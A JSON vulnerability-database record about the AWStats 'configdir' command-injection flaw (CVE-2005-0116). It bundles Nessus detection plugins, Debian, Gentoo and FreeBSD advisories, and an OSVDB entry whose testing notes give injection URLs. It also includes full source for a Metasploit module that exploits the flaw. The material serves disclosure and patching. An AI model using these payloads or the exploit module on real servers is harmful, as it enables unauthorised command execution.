is Copyright (C) 2005-2021 and is owned by 
Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-misc/awstats\", unaffected:make_list(\"ge 6.3-r2\"), vulnerable:make_list(\"lt 6.3-r2\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"AWStats\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-06T10:03:15", "description": "In addition to CAN-2005-0116 more vulnerabilities have been found in\nawstats, a powerful and featureful web server log analyzer with a CGI\nfrontend. 
Missing input sanitising can cause arbitrary commands to be\nexecuted.", "edition": 25, "published": "2005-02-16T00:00:00", "title": "Debian DSA-682-1 : awstats - missing input sanitizing", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2005-0438", "CVE-2005-0435", "CVE-2005-0437", "CVE-2005-0362", "CVE-2005-0116", "CVE-2005-0436", "CVE-2005-0363"], "modified": "2005-02-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:awstats", "cpe:/o:debian:debian_linux:3.0"], "id": "DEBIAN_DSA-682.NASL", "href": "https://www.tenable.com/plugins/nessus/16464", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-682. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(16464);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2005-0362\", \"CVE-2005-0363\", \"CVE-2005-0435\", \"CVE-2005-0436\", \"CVE-2005-0437\", \"CVE-2005-0438\");\n script_xref(name:\"DSA\", value:\"682\");\n\n script_name(english:\"Debian DSA-682-1 : awstats - missing input sanitizing\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In addition to CAN-2005-0116 more vulnerabilities have been found in\nawstats, a powerful and featureful web server log analyzer with a CGI\nfrontend. 
Missing input sanitising can cause arbitrary commands to be\nexecuted.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=294488\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2005/dsa-682\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the awstats package.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 4.0-0.woody.2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:awstats\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2005/02/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2005/02/16\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2005/02/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2005-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.0\", prefix:\"awstats\", reference:\"4.0-0.woody.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else 
security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:05", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0116"], "description": "\nAn iDEFENSE Security Advisory reports:\n\nRemote exploitation of an input validation vulnerability\n\t in AWStats allows attackers to execute arbitrary commands\n\t under the privileges of the web server.\nThe problem specifically exists when the application is\n\t running as a CGI script on a web server. The \"configdir\"\n\t parameter contains unfiltered user-supplied data that is\n\t utilized in a call to the Perl routine open()...\nSuccessful exploitation allows remote attackers to\n\t execute arbitrary commands under the privileges of the web\n\t server. This can lead to further compromise as it provides\n\t remote attackers with local access.\n\n", "edition": 4, "modified": "2005-02-23T00:00:00", "published": "2004-10-21T00:00:00", "id": "0F5A2B4D-694B-11D9-A9E7-0001020EED82", "href": "https://vuxml.freebsd.org/freebsd/0f5a2b4d-694b-11d9-a9e7-0001020eed82.html", "title": "awstats -- remote command execution vulnerability", "type": "freebsd", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:08", "bulletinFamily": "software", "cvelist": ["CVE-2005-0116"], "edition": 1, "description": "## Vulnerability Description\nAWStats contains a flaw that may allow a malicious user to issue arbitray commands under the web server privileges. The issue is triggered when using the pipe character (|) and shell metacaracters in the 'configdir' variable of the awstat.pl script. Such input is not santitized before being passed to the perl 'open()' command to be executed.\n## Technical Description\nThe AWstats website announced that installations are safe from remote command execution if you set the variable '$!AllowToUpdateStatsFromBrowser' to '0' (off). 
However, subsequent testing indicates this does not fully mitigate the vulnerability.\n## Solution Description\nUpgrade to version 6.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.\n## Short Description\nAWStats contains a flaw that may allow a malicious user to issue arbitrary commands under the web server privileges. The issue is triggered when using the pipe character (|) and shell metacharacters in the 'configdir' variable of the awstats.pl script. Such input is not sanitized before being passed to the perl 'open()' command to be executed.\n## Manual Testing Notes\nhttp://[target]/cgi-bin/awstats/awstats.pl?configdir=|echo%20;echo%20;id;echo%20;echo|\nhttp://[target]/cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;%20touch%20evilfile;\n## References:\nVendor URL: http://awstats.sourceforge.net/\nVendor Specific News/Changelog Entry: http://awstats.sourceforge.net/docs/awstats_changelog.txt\n[Secunia Advisory ID:13893](https://secuniaresearch.flexerasoftware.com/advisories/13893/)\n[Secunia Advisory ID:14007](https://secuniaresearch.flexerasoftware.com/advisories/14007/)\nOther Advisory URL: http://security.gentoo.org/glsa/glsa-200501-36.xml\nOther Advisory URL: http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities\nOther Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2005-006.txt\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-01/0288.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-02/0258.html\n[CVE-2005-0116](https://vulners.com/cve/CVE-2005-0116)\nCERT VU: 272296\n", "modified": "2005-01-01T01:11:30", "published": "2005-01-01T01:11:30", "id": "OSVDB:13002", "href": "https://vulners.com/osvdb/OSVDB:13002", "title": "AWStats awstats.pl configdir Parameter Arbitrary Command Execution", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], 
"metasploit": [{"lastseen": "2020-08-13T00:01:32", "description": "This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. iDEFENSE has confirmed that AWStats versions 6.1 and 6.2 are vulnerable.\n", "published": "2007-01-05T04:28:32", "type": "metasploit", "title": "AWStats configdir Remote Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-0116"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/UNIX/WEBAPP/AWSTATS_CONFIGDIR_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'AWStats configdir Remote Command Execution',\n 'Description' => %q{\n This module exploits an arbitrary command execution vulnerability in the\n AWStats CGI script. 
iDEFENSE has confirmed that AWStats versions 6.1 and 6.2\n are vulnerable.\n },\n 'Author' => [ 'Matteo Cantoni <goony[at]nothink.org>', 'hdm' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2005-0116'],\n ['OSVDB', '13002'],\n ['BID', '12298'],\n ['URL', 'http://www.idefense.com/application/poi/display?id=185&type=vulnerabilities'],\n ],\n 'Privileged' => false,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Space' => 512,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd cmd_bash',\n 'RequiredCmd' => 'generic perl ruby python telnet bash-tcp',\n }\n },\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Targets' => [[ 'Automatic', { }]],\n 'DisclosureDate' => 'Jan 15 2005',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('URI', [true, \"The full URI path to awstats.pl\", \"/cgi-bin/awstats.pl\"]),\n ])\n end\n\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URI']),\n 'vars_get' =>\n {\n 'configdir' => '|echo;cat /etc/hosts;echo|'\n }\n }, 25)\n\n if (res and res.body.match(/localhost/))\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def exploit\n command = Rex::Text.uri_encode(payload.encoded)\n urlconfigdir = normalize_uri(datastore['URI']) + \"?configdir=|echo;echo%20YYY;#{command};echo%20YYY;echo|\"\n\n res = send_request_raw({\n 'uri' => urlconfigdir,\n 'method' => 'GET',\n 'headers' =>\n {\n 'Connection' => 'Close',\n }\n }, 25)\n\n if (res)\n print_status(\"The server returned: #{res.code} #{res.message}\")\n\n m = res.body.match(/YYY\\n(.*)\\nYYY/m)\n\n if (m)\n print_status(\"Command output from the server:\")\n print(\"\\n\" + m[1] + \"\\n\\n\")\n else\n print_status(\"This server may not be vulnerable\")\n end\n else\n print_status(\"No response from the server\")\n end\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": 
"https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/awstats_configdir_exec.rb"}], "debian": [{"lastseen": "2019-05-30T02:21:59", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0116", "CVE-2005-0363"], "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 682-1 security@debian.org\nhttp://www.debian.org/security/ Martin Schulze\nFebruary 15th, 2005 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : awstats\nVulnerability : missing input sanitising\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CAN-2005-0363\nDebian Bug : 294488\n\nIn addition to CAN-2005-0116 more vulnerabilities have been found in\nawstats, a powerful and featureful web server log analyzer with a CGI\nfrontend. Missing input sanitising can cause arbitrary commands to be\nexecuted.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 4.0-0.woody.2.\n\nFor the unstable distribution (sid) this problem has been fixed in\nversion 6.2-1.2.\n\nWe recommend that you upgrade your awstats package.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.0 alias woody\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0-0.woody.2.dsc\n Size/MD5 checksum: 574 16e16b5bee949c6d82b8d9f7a3357d64\n http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0-0.woody.2.diff.gz\n Size/MD5 checksum: 8779 
8ff8db0ad2c91038043a045c0f1f2924\n http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0.orig.tar.gz\n Size/MD5 checksum: 472738 58b68e7d5f3be4437e64c5425eb6513e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/a/awstats/awstats_4.0-0.woody.2_all.deb\n Size/MD5 checksum: 356838 309cd1baaf3f0ffb5126bb7850d061f1\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n\n", "edition": 2, "modified": "2005-02-15T00:00:00", "published": "2005-02-15T00:00:00", "id": "DEBIAN:DSA-682-1:3FA20", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2005/msg00060.html", "title": "[SECURITY] [DSA 682-1] New awstats packages fix arbitrary command execution", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:07", "bulletinFamily": "unix", "cvelist": ["CVE-2005-0362", "CVE-2005-0116", "CVE-2005-0363"], "description": "### Background\n\nAWStats is an advanced log file analyzer and statistics generator. \n\n### Description\n\nWhen 'awstats.pl' is run as a CGI script, it fails to validate specific inputs which are used in a Perl open() function call. Furthermore, a user could read log file content even when plugin rawlog was not enabled. \n\n### Impact\n\nA remote attacker could supply AWStats malicious input, potentially allowing the execution of arbitrary code with the rights of the web server. He could also access raw log contents. 
\n\n### Workaround\n\nMaking sure that AWStats does not run as a CGI script will avoid the issue, but we recommend that users upgrade to the latest version, which fixes these bugs. \n\n### Resolution\n\nAll AWStats users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-misc/awstats-6.3-r2\"\n\nNote: Users with the vhosts USE flag set should manually use webapp-config to finalize the update.", "edition": 1, "modified": "2009-05-28T00:00:00", "published": "2005-01-25T00:00:00", "id": "GLSA-200501-36", "href": "https://security.gentoo.org/glsa/200501-36", "type": "gentoo", "title": "AWStats: Remote code execution", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}